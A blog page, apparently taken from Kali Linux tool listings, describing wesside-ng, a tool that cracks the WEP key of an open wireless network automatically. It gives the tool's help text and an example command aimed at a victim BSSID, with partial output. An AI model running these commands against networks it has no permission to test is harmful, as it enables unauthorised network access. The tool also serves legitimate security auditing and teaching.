Crack a WEP key of an open network without user intervention with Wesside-ng

Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme, reinject ARP requests and finally determine the WEP key. All this is done without your intervention.

Crack a WEP key of an open network without user intervention

root@kali:~# wesside-ng -h

Wesside-ng 1.2 rc4 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org

Usage: wesside-ng <options>

Options:

-h              : This help screen
-i      <iface> : Interface to use (mandatory)
-m      <my ip> : My IP address
-n     <net ip> : Network IP address
-a      <mymac> : Source MAC Address
-c              : Do not crack the key
-p   <min prga> : Minimum bytes of PRGA to gather
-v <victim mac> : Victim BSSID
-t  <threshold> : Cracking threshold
-f   <max chan> : Highest scanned chan (default: 11)
-k      <txnum> : Ignore acks and tx txnum times

wesside-ng Usage Example

Use the specified monitor mode interface (-i wlan0mon) and target a single BSSID (-v de:ad:be:ef:ca:fe).

root@kali:~# wesside-ng -i wlan0mon -v de:ad:be:ef:ca:fe
[18:31:52] Using mac 3C:46:D8:4E:EF:AA
[18:31:52] Looking for a victim...
[18:32:13] Chan 04 -

Source:

Author: Thomas d’Otreppe, Original work: Christophe Devine

License: GPLv2

Check Also

SamSam Ransomware

SamSam Ransomware

The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the …

New Exploits for Unsecure SAP Systems - blackMORE Ops

New Exploits for Unsecure SAP Systems

A presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet, as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed “10KBLAZE.” The presentation detailed the new exploit tools and reports on systems exposed to the internet.

One comment

  1. That was so helpful. Thanks for sharing with us. I appreciated what you done.

Use WordPress.com, Twitter, Facebook, or Google+ accounts to comment (anonymous comments allowed). Leave your solution to help others.

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Privacy Policy on Cookies Usage

Some services used in this site uses cookies to tailor user experience or to show ads.

%d bloggers like this: